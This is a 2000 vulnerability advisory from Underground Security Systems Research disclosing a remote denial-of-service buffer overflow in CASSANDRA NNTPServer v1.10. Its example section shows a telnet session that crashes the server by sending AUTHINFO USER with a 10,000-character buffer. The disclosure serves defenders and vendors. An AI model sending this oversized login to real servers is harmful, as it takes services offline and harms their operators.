-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Remote DoS attack in CASSANDRA NNTPServer v1.10 from ATRIUM SOFTWARE
Vulnerability
USSR Advisory Code: USSR-2000039
Release Date:
May 1, 2000
Systems Affected:
CASSANDRA NNTPServer Version v1.10 (WinNT / Win95)
THE PROBLEM
The Ussr Labs Team has recently discovered a buffer overflow problem
in the CASSANDRA NNTPServer v1.0. What happens is preforming an
attack with a large login information Port 119, cause the proccess
containg the services to stop responding.
Thanks to [Racer X] to let us know about this.
Example:
[[email protected]$ telnet example.com 119
Trying example.com…
Connected to example.com.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95
ready at Mon, 1
May 2000 xx:xx:xx ±300 (posting allowed)
AUTHINFO USER (buffer)
Where buffer is 10000 characters.
It will take down the service, making it non-functional, (untill
Reboot)
Vendor Status:
Informed.
Vendor Url: http://www.atrium.de/
Program Url: http://www.atrium.de/cassandra/cassandra_e.cfm
Download Url: http://www.atrium.de/download/casnntpe.exe
Related Links:
Underground Security Systems Research
http://www.ussrback.com
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Technotronic and Wiretrip. HNC
Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
[email protected] for permission.
Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.
Feedback:
Please send suggestions, updates, and comments to:
Underground Security Systems Research
mail:[email protected]
http://www.ussrback.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>
iQA/AwUBOQ2fvqVRYEYcg938EQLENwCghcyHyWCwhNHp/bg8eDGE35mcrfcAnRdv
DtNlXuAKI5b6B5uS16H9bIKI
=DCTg
-----END PGP SIGNATURE-----